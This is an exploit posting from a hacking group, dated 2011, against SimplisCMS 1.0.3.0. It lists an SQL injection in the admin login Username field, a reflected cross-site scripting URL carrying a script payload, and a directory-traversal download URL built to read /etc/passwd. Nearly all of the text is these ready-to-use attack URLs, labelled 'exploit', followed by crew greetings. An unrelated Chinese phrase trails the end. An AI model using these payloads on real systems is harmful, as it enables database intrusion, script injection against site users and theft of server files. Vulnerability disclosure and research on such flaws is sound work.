########################################################## # home : http://www.D99Y.com # Date: 27/3/2011 # Author: NassRawI # Software Link: http://modcove.com/index.php # Demo : http://modcove.com/index.php?page=demo # Version: 1.0.3.0 ########################################################## # # [1] SQL injection # # http://localhost/simpliscms/admin/index.php # # # Injection in the Username field # # # [2] Cross Site Scripting # # file : # # admin/application/plugins/scaffold/index.php # # exploit: # # http://localhost/simpliscms/admin/application/plugins/scaffold/index.php?f=[ XSS ] # # http://localhost/simpliscms/admin/application/plugins/scaffold/index.php?f=<FONT size=7 >NassRaWi</FONT> <script>alert("www.d99y.com")</script> # # ########################################################## [3]Remote File Disclosure # file : # # simpliscms/admin/index.php # # exploit: # # # http://localhost/simpliscms/admin/index.php?action=do_download&download_file=[ Read files ]&page=§ion=pages # # # http://localhost/simpliscms/admin/index.php?action=do_download&download_file=../../../../../../../etc/passwd&page=§ion=pages # ########################################################## Greetz : D99Y Team + alroo7 alte No Tkd3 + oхіјєή + ǺŁṀṨŘŎŎŖĨ+ JEenY + anT!-Tr0J4n+ ReBLOoOV + FoFo < x-shadowmy baby :$ + Difficult 511 and all members D99Y.CoM Enjoy :)
体验盒子
